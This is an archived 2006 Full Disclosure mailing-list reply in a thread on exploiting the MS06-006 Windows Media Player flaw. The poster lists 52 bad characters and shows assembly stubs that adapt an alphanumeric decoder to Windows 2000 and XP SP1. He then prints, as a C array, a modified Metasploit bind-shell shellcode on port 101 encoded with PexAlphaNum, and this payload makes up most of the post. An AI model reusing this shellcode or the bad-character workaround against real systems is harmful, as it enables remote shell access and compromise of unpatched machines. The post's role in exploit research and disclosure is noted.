Full Disclosure mailing list archives
Re: MS06-06 Windows Media Player Exploitation
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Thu, 16 Feb 2006 23:54:50 +0100
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 if you try the shellcode this wont work of course because its made in another exploitation environment, but at least if you are in the same case you can try to do via this method, depending of your current registers and modding the shellcode header to feat with your vulnerability environment where the metasploit project can't mod this "locked" header. hope it helps. ad () heapoverflow com wrote:
not sure about what you are looking for but read this below , it's from an unpublished poc where I had to trick with 52 badchars: - -------------------------------------------------------------------------------------------- 52 BADCHARS: 0x00 0x22 0x61 0x62 0x63 0x64 0x65 0x66 0x67 0x68 0x69 0x70 0x71 0x72 0x73 0x74 0x75 0x76 0x77 0x78 0x79 0xE0 0xE1 0xE2 0xE3 0xE4 0xE5 0xE6 0xE7 0xE8 0xE9 0xEA 0xEB 0xEC 0xED 0xEE 0xEF 0xF0 0xF1 0xF2 0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB 0xFC 0xFD 0xFE 0xFF Due to the high number of bad chars, especially an upper/lower case conflict, I have used the msf bind shellcode port 101 with the PexAlphaNum encoder. EB 03 JMP SHORT 0012EE63 59 POP ECX EB 05 JMP SHORT 0012EE68 E8 F8FFFFFF CALL 0012EE60 But it contains 7 bad chars as you can see, so another way is (for 2k): 83C3 1C ADD EBX,1C 53 PUSH EBX 59 POP ECX Because ebx+1c is a fixed addr pointing were the alphanum shellcode starts, and so on, is popped to ecx correctly, and 0 badchars. And the one for XP sp1 (because no more direct pointer where I need, but I found near the dword of a reg): 834424 08 1C ADD DWORD PTR SS:[ESP+8],1C 895C24 08 MOV EBX,DWORD PTR SS:[ESP+8] 53 PUSH EBX 59 POP ECX - ------------------------------------------------------------------------------------------------ /*modded metasploit bindshellcode port 101*/ char scode1[]= "\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59" /*upon this text is the modded header for 2k, it changes depending the OS you exploit, read my exploit's header or debug for much informations, this is how I trick with 52 badchars... thks to msf guys for all the rest, this is a great alphanum uppercase shellcode really appreciated here :)*/ "\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58" "\x4e\x36\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37" "\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48" "\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x48" "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x42\x45\x47\x45\x4e\x4b\x48" "\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x54" "\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38" "\x49\x58\x4e\x56\x46\x32\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d" "\x46\x36\x4b\x48\x43\x44\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x38" "\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x44\x4a\x50\x50\x55\x4a\x36" "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56" "\x43\x55\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x57" "\x44\x53\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e" "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e" "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50" "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35" "\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x35\x43\x55\x43\x34" "\x43\x35\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x42\x30" "\x45\x56\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a" "\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x51" "\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d" "\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d" "\x42\x45\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46" "\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45" "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x36\x43\x56" "\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x45\x49\x45\x49\x52\x4e\x4c" "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c" "\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x44\x4e\x52" "\x43\x49\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56" "\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x54\x4f\x4f" "\x48\x4d\x4b\x45\x47\x35\x44\x45\x41\x55\x41\x35\x41\x35\x4c\x46" "\x41\x30\x41\x55\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x36" "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f" "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" "\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d" "\x4f\x4f\x42\x4d\x5a"; c0ntex wrote:No exploit, just some basic research - anyone with 100% Ascii win32shellcode?http://open-security.org/winmedia/index.html -- regards c0ntex _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/UCuq+LRXunxpxfAQKbRhAAg36gK/tnR1g8BZ+IijjF6SbdSlynx9/H uWDItyVcOmwvW7asCIH9HQ+xxT/P1oeBsCFL+tSGT4GBDiTEsv65j6kJVnMCeCTc f2v/cO9bm76Nq1SCBwNECcZvpzl0zpZ8ViU/ty1wHJVKtql45xLEJhKTpH6Cb049 OaqQhxIIqlLGZ+MwVjcG8RpK8bJnCOV38NU0tZqzp8POYSXuOaAtrIwI1BD+CECd Xl+NwOZ4xBF4RZz0xchvH+CxmWwW5K8tDoENc9Qre4LXdSCO9juBBA3KTuPW+uq9 6+5FbiHFcNWHwTU1WvHWTEmUNGAnDwr8sgI648nbFvbhtlbwbXnT4+RoK4gd3cSl 0H91/BEnCCleAwXB6pjw5B15S5Z13ffVZTaPkVEsp21t59TC7mPpKuJ4L5GRR0Ku bkLD7MWzypyp8LBLtT0HiVAKyNviqJD8t5utXz62UHZdpYrumZFTpzwwQ9ntslxw qDAVYS5bHgF31p4TjkNog+4GsA8QnZ831qn7vTGAlPjSacocu5hi3nJEDb8PcndP BcT7awGKO9RlvPfDOkiwEnZdW6pIzIeDmHb9Qc/DI80UwfPtw8+4xG0rgEG5mLpz DxAyiPdOTf36K7wIWKmin4lU5/AyAlU1QhXziMlj+xuot/0TPjDGOJkVDCXIUneY 8S5UI5tiDww= =tYT1 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)